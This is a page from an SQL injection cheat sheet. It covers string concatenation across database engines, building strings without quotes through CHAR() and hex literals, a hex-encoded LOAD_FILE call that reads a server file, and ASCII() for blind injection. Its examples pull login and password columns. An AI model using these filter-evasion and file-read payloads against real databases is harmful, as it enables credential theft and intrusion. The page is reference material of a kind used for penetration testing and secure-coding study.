Sql Injection Cheat Sheet Page 5
ADVERTISEMENT
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18•
(S)
+
SELECT login + '-' + password FROM members
•
(*MO)
||
SELECT login || '-' || password FROM members
*About MySQL "||";
If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it
as `logical operator` it’ll return 0. Better way to do it is using
function in
CONCAT()
MySQL.
•
(M)
CONCAT(str1, str2, str3, ...)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members
Strings without Quotes
These are some direct ways to using strings but it’s always possible to use
(MS)
CHAR()
and
(M) to generate string without quotes.
CONCAT()
•
(M) - Hex Representation of string
0x457578
SELECT 0x457578
This will be selected as string in MySQL.
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
•
Using
in MySQL
CONCAT()
(M)
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
This will return ‘KLM’.
•
(S)
SELECT CHAR(75)+CHAR(76)+CHAR(77)
This will return ‘KLM’.
Hex based SQL Injection Samples
•
(M)
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
This will show the content of c:\boot.ini
String Modification & Related
•
(SMP)
ASCII()
Returns ASCII character value of leftmost character. A must have function for
Blind SQL Injections.
SELECT ASCII('a')
•
(SM)
CHAR()
Convert an integer of ASCII.
SELECT CHAR(64)
ADVERTISEMENT
0 votes
Related Articles
Related forms
Related Categories
Parent category: Education